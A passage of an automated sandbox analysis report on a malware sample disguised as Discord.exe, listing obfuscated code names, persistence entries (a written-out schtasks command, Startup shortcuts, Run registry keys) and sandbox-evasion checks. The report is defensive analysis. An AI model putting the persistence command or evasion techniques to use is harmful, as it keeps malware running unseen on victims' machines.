Source: Discord.exe.0.dr, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.cs | High entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
Source: Discord.exe.0.dr, U9pHMOisPp.cs | High entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
Source: Discord.exe.0.dr, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.cs | High entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
Source: Discord.exe.0.dr, EthTUQiaut.cs | High entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | High entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File created: C:\Users\user\AppData\Roaming\Discord.exe

Boot Survival

Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Discord
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Discord

Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: s3OBQLA3xR.exe, Discord.exe.0.dr | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Memory allocated: 29A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Memory allocated: 1ABA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 730000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 1A5F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: B00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 1A600000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 11A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 1AD30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 1A6B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: A30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Memory allocated: 1A900000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Window / User API: threadDelayed 8028
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Window / User API: threadDelayed 1794
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6392
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3387
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8143
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1430
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8240
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1096
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7627
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2010
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe TID: 7524 | Thread sleep time: -40582836962160988s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 | Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 | Thread sleep count: 8143 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 | Thread sleep count: 1430 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 | Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700 | Thread sleep count: 7627 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272 | Thread sleep count: 2010 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7588 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 796 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7972 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7832 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exe | File Volume queried: C:\ FullSizeInformation
                    Source: Discord.exe.0.dr | Binary or memory string: vmware
                    Source: s3OBQLA3xR.exe, Discord.exe.0.dr | Binary or memory string: wQCovZLVGej8P2DgoDmpnj6MmF3M4jMR2qEH8rldPDYmc37BxcsAttOchGfsvSxbaH5Z
                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB2F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
